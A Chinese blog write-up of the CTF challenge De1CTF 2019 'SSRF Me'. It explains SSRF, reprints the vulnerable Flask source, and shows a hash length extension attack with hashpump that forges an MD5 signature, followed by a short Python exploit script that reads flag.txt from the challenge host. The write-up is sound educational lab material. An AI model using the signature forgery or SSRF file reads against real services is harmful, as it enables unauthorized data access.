[De1CTF 2019]SSRF Me 1

最新推荐文章于 2024-01-08 18:58:39 发布
最新推荐文章于 2024-01-08 18:58:39 发布
阅读量1.4k 收藏 4
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/123999788
版权

[De1CTF 2019]SSRF Me 1

SSRF概述

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。

打开题目得到:

在这里插入图片描述

是flash的网站源码
整理得到:

#! /usr/bin/env python #encoding=utf-8 
from flask import Flask 
from flask import request 
import socket 
import hashlib 
import urllib 
import sys 
import os 
import json 
reload(sys) 
sys.setdefaultencoding('latin1') 
app = Flask(__name__) 
secert_key = os.urandom(16) 
class Task: 
    def __init__(self, action, param, sign, ip): 
        self.action = action 
        self.param = param 
        self.sign = sign 
        self.sandbox = md5(ip) 
        if(not os.path.exists(self.sandbox)): 
            #SandBox For Remote_Addr 
            os.mkdir(self.sandbox) 



    def Exec(self): 
        result = {} 
        result['code'] = 500 
        if (self.checkSign()): 
            if "scan" in self.action: 
                tmpfile = open("./%s/result.txt" % self.sandbox, 'w') 
                resp = scan(self.param) 
                if (resp == "Connection Timeout"): 
                    result['data'] = resp 
                else: 
                    print (resp) 
                    tmpfile.write(resp) 
                    tmpfile.close() 
                    result['code'] = 200 


                if "read" in self.action: 
                    f = open("./%s/result.txt" % self.sandbox, 'r') 
                    result['code'] = 200 
                    result['data'] = f.read() 


                if result['code'] == 500: 
                    result['data'] = "Action Error" 


            else: 
                result['code'] = 500 
                result['msg'] = "Sign Error" 
            return result 



def checkSign(self): 
    if (getSign(self.action, self.param) == self.sign): 
        return True 
    else: 
        return False 



#generate Sign For Action Scan. 


@app.route("/geneSign", methods=['GET', 'POST']) 
def geneSign(): 
    param = urllib.unquote(request.args.get("param", "")) 
    action = "scan" 
    return getSign(action, param) 





@app.route('/De1ta',methods=['GET','POST']) 
def challenge(): 
    action = urllib.unquote(request.cookies.get("action")) 
    param = urllib.unquote(request.args.get("param", "")) 
    sign = urllib.unquote(request.cookies.get("sign")) 
    ip = request.remote_addr 
    if(waf(param)): 
        return "No Hacker!!!!" 
    task = Task(action, param, sign, ip) 
    return json.dumps(task.Exec()) 



    
@app.route('/') 
def index(): 
    return open("code.txt","r").read() 





def scan(param): 
    socket.setdefaulttimeout(1) 
    try: 
        return urllib.urlopen(param).read()[:50] 
    except: 
        return "Connection Timeout" 



            
def getSign(action, param): 
    return hashlib.md5(secert_key + param + action).hexdigest() 
    
def md5(content): 
    return hashlib.md5(content).hexdigest() 
    
def waf(param): 
    check=param.strip().lower() 
    if check.startswith("gopher") or check.startswith("file"): 
        return True 
    else: 
        return False 
        
        
if __name__ == '__main__': 
    app.debug = False 
    app.run(host='0.0.0.0',port=80)

发现有三个路由分别是:

/geneSign

@app.route("/geneSign", methods=['GET', 'POST']) 
def geneSign(): 
    param = urllib.unquote(request.args.get("param", "")) 
    action = "scan" 
    return getSign(action, param)

用于生产签名,通过调用getSign函数

/De1ta

@app.route('/De1ta',methods=['GET','POST']) 
def challenge(): 
    action = urllib.unquote(request.cookies.get("action")) 
    param = urllib.unquote(request.args.get("param", "")) 
    sign = urllib.unquote(request.cookies.get("sign")) 
    ip = request.remote_addr 
    if(waf(param)): 
        return "No Hacker!!!!" 
    task = Task(action, param, sign, ip) 
    return json.dumps(task.Exec())

获取cookie的action,sign和get的param值,param值要通过waf验证,调用task类,并调用Exec方法,最后以json形式返回结果。

/

@app.route('/') 
def index(): 
    return open("code.txt","r").read()

获取首页源码

getSign函数

def getSign(action, param): 
    return hashlib.md5(secert_key + param + action).hexdigest()

将secert_key 、 param 和 action拼接在一起,返回MD5加密的结果

waf函数

def waf(param):
    check=param.strip().lower()
    if check.startswith("gopher") or check.startswith("file"):
        return True
    else:
        return False

找到以gopher或file开头的,结合上面的路由即是将这两个协议过滤掉了

在看Exec方法,判断action里是否有scan,如果有的话则将scan读到的内容写进result.txt;如果read在action里,则将result.txt的内容读出来。

分析完代码我们发现getSign默认只生成action为scan的签名,我们可以利用将flag.txt的内容读到result.txt里,如果我们想要将result.txt的内容读出来则需要伪造一个action为read的签名

我们可以利用哈希长度扩展攻来构造签名

哈希长度扩展攻:
参考博客:
https://www.cnblogs.com/ProbeN1/p/14875284.html

首先访问:/geneSign
获取签名
在这里插入图片描述

又因为:secert_key + ‘flag.txt’ 的长度为24

所有利用hashpump

获取sign和action:

在这里插入图片描述
在把\x替换为%

去/De1ta请求获取flag.txt文件

python编写的exp:

import requests
url = 'http://4d51d38b-7a93-4588-9dbb-7c72b2440ab1.node4.buuoj.cn:81/De1ta?param=flag.txt'
cookies = {
  'sign': 'b7becf4708254321e2a01148321a70ae',
  'action': "scan%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e0%00%00%00%00%00%00%00read"
  }


res = requests.get(url=url, cookies=cookies)
print(res.text)

得到flag:

在这里插入图片描述

参考博客:
https://blog.csdn.net/weixin_44677409/article/details/99412885

南冥~
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[De1CTF 2019]SSRF Me1 解题思路
xiyuanyue的博客
10-10 434
1、/De1ta接口 md5(secert_key +param+action) 生成的sign 等于 接口 /geneSign 的sign md5(secert_key + param + 'scan')1、读取cookie中的action、sign 客户端ip 和 param参数值,当param参数值不是gopher、file绕过waf,初始化类 Task ,然后调用类的exec 方法。构建出来paload 尝试读取/etc/passwd 文件,成功读取/etc/passwd文件内容。
[De1CTF 2019]SSRF Me
qq_43774856的博客
12-01 130
[De1CTF 2019]SSRF Me 打开链接,得到源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(_
SSRF漏洞学习
weixin_30387663的博客
04-13 312
SSRF SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从...
网络安全-SSRF漏洞原理、攻击与防御
关注网络安全、云原生安全
09-05 2万+
概述 SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统(因为他是从内部系统访问的,所以它能够请求到与它相连而与外网隔离的内部系统。)。 原理 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档等等。SSRF漏洞通过篡改获取资源的请求发送给服务器(服...
漏洞原理——ssrf
nobugnomoney的博客
04-04 2万+
一、什么是SSRF 1、简单了解 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统。也就是说可以利用一个网络请求的服务,当作跳板进行攻击。 攻击者利用了可访问Web服务器(A)的特定功能 构造恶意payload;攻击者在访问A时,利用A的特定功能构造特殊payload,由A发起对内部
SSRF详解(包含多种SSRF攻击)
Zyu0
11-28 5267
服务器端请求伪造(也称为 SSRF)是一种 Web 安全漏洞,允许攻击者诱导服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能会强制服务器连接到任意外部系统,从而可能泄露授权凭证等敏感数据。如果攻击者能够将url参数更改为localhost,这可能允许他们查看服务器上托管的本地资源,从而使其容易受到服务器端请求伪造的攻击。滥用易受攻击的服务器与其他系统之间的信任关系绕过 IP 白名单。
De1CTF2020:De1CTF2020
02-18
De1CTF2020:一场技术的盛宴】 De1CTF2020是一场备受瞩目的网络安全竞赛,通常在CTF(Capture The Flag)领域内举办。CTF比赛是信息安全爱好者和专业人士展示技能、学习新知识并互相交流的平台。这种竞赛涵盖了多...
De1ctf 2020 -‘check in’ writeup
01-09
在CTF(Capture The Flag)竞赛中,"De1ctf 2020 - ‘check in’" 是一道挑战性的安全题目,主要涉及到多个网络安全技术的综合运用,特别是与Web应用程序安全相关的方面。该题目的核心是通过理解并利用服务器配置中...
De1CTF.zip
07-20
De1CTF逆向 pwn等,除web,misc外均有
DE1-SoC-User-manual DE1-SoC用户手册
11-23
第1章:DE1-SOC开发套件 在这一章节中,主要概述了DE1-SOC开发套件的基本内容,包括用户在购买时可以期待的包装内容。通常,开发套件会包含DE1-SOC主板、电源适配器、连接线缆以及必要的软件和文档光盘。此外,用户...
writeup:CTF挑战撰写
05-28
欢迎阅读我们的文章! 自2018年以来,r3kapig是一个统一的CTF团队,主要来自Eur3kA和... :2020 de1ctf写入 :0CTF / TCTF 2020质量报告 :GeekPwn云上挑战赛 20201020-n1ctf :N1CTF 2020撰写 20210111-rwctf-
DE1-soc 内部资料
03-10
1. `Verify.md5` 和 `Verify.sfv`:这两个文件通常用于校验文件的完整性和一致性。MD5(Message-Digest Algorithm 5)和SFV(Simple File Verifier)都是校验码工具,通过计算文件的哈希值,确保文件在传输或存储...
DE1.rar_assignment_de1
07-15
de1 board pin assignment
DE1-SoC-FAQ整理
11-23
A7: 1) DE1-SoC 的 Control Panel 基于 QT 库,而普通 FPGA 开发板的控制面板使用 Borland C++ Builder。 2) DE1-SoC 的 Control Panel 通过 AXI 总线与 FPGA 交互,运行在 Linux 上,而无 SoC 的 FPGA 开发板的控制...
[De1CTF 2019]SSRF Me 1——python代码审计
m0_62879498的博客
05-09 612
[De1CTF 2019]SSRF Me 1 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__)
[De1ctf 2019]SSRF Me(哈希拓展攻击)
最新发布
2301_76690905的博客
01-08 1733
在secret_key + param + action里,已知secert_key = os.urandom(16)(长度16),已知明文flag.txt(param)和scan(action),我们需要添加read。把flag.txt算进秘钥长度里,则秘钥长度为16+8,已知明文为scan,已知hash为8370a8f86a7a74b4053d1bc554a9d126,拓展明文为read,启动刚刚的脚本依次填入得到新明文和新hash,
SSRF漏洞原理攻击与防御(超详细总结)
热门推荐
hello
04-09 5万+
SSRF漏洞原理攻击与防御 目录 CSRF漏洞原理攻击与防御一、SSRF是什么?二、SSRF漏洞原理三、SSRF漏洞挖掘四、产生SSRF漏洞的函数五、SSRF中URL的伪协议六、SSRF漏洞利用(危害)七、SSRF绕过方式八、SSRF漏防御 提示:以下是本篇文章正文内容,下面案例可供参考 一、SSRF是什么? SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系
[de1ctf 2019]ssrf me 1
03-16
[de1ctf 2019]ssrf me 1 是一道关于SSRF的题目。它的目标是通过利用SSRF漏洞,访问位于内部网络中的一个HTTP服务,从而获取flag。 具体来说,题目中提供了一个Web应用程序,该应用程序允许用户输入一个URL,然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值